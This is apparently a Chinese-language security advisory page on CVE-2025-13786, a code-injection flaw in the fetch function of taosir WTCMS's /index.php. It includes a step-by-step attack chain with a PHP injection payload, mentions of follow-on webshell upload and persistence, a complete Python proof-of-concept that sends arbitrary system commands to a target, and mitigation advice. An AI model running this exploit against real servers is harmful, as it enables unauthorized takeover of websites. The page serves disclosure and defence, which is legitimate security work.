CVE-2025-13786 CVSS 7.3 高危

CVE-2025-13786 WTCMS fetch函数远程代码执行漏洞

披露日期: 2025-11-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13786

漏洞类型

远程代码执行

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

taosir WTCMS

漏洞概述

CVE-2025-13786是taosir WTCMS中的一个高危代码注入漏洞，CVSS评分7.3。该漏洞存在于/index.php文件的fetch函数中，攻击者可通过操控content参数实现远程代码执行。漏洞影响WTCMS 01a5f68a3dfc2fdddb44eed967bb2d4f60487665及之前版本。由于该产品采用滚动发布模式，官方尚未提供明确的版本修复信息。攻击者可在无需认证的情况下远程利用此漏洞，对系统造成严重威胁。该漏洞已于2025年11月30日公开披露，厂商在收到提前通知后未作出任何回应。

技术细节

该漏洞为代码注入（Code Injection）类型，出现在WTCMS的/index.php文件中的fetch函数。攻击者通过构造恶意的content参数，将任意PHP代码注入到服务器端并执行。由于漏洞存在于核心文件的关键函数中，且无需任何认证即可利用，攻击门槛较低。漏洞利用方式为：通过HTTP请求向/index.php发送包含恶意代码的content参数，服务器在处理该参数时未进行充分的输入过滤和参数校验，导致注入的代码被PHP解释器执行。成功利用后可获得服务器命令执行权限，实现对目标系统的完全控制。

攻击链分析

STEP 1

步骤1

攻击者识别目标站点使用的WTCMS版本，确认版本在受影响范围内（<= 01a5f68a3dfc2fdddb44eed967bb2d4f60487665）

STEP 2

步骤2

构造恶意HTTP请求，访问/index.php文件，调用fetch函数

STEP 3

步骤3

在content参数中注入PHP代码，如: '; system('whoami'); //

STEP 4

步骤4

服务器端fetch函数未对content参数进行过滤，直接将恶意代码拼接执行

STEP 5

步骤5

注入的PHP代码在服务器上执行，攻击者获得命令执行能力，可执行任意系统命令

STEP 6

步骤6

通过命令执行进一步渗透，可读取敏感配置文件、上传webshell、建立持久化后门等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13786 PoC - WTCMS Remote Code Execution
# Target: taosir WTCMS up to 01a5f68a3dfc2fdddb44eed967bb2d4f60487665

def exploit(target_url, command):
    """
    Exploit code injection in WTCMS /index.php fetch function
    """
    # Construct the malicious request
    endpoint = f"{target_url.rstrip('/')}/index.php"
    
    # Payload: Inject PHP code via content parameter
    # The fetch function processes the content parameter without sanitization
    payload = f"'; system('{command}'); //"
    
    data = {
        'c': 'fetch',  # Target the fetch function
        'content': payload
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        print(f"[*] Request sent to {endpoint}")
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response:\n{response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <command>")
        print(f"Example: python {sys.argv[0]} http://target.com 'id'")
        sys.exit(1)
    
    target = sys.argv[1]
    cmd = sys.argv[2]
    exploit(target, cmd)

影响范围

taosir WTCMS <= 01a5f68a3dfc2fdddb44eed967bb2d4f60487665

防御指南

临时缓解措施

由于官方尚未发布修复版本，建议临时采取以下措施：1) 在Web应用层添加输入过滤规则，对content参数进行严格校验；2) 限制对/index.php的访问，配置Nginx/Apache规则禁止直接访问；3) 临时关闭fetch函数功能；4) 部署WAF防护规则识别常见的代码注入特征；5) 加强服务器权限控制，限制Web服务的文件系统权限；6) 定期监控日志，及时发现异常请求行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表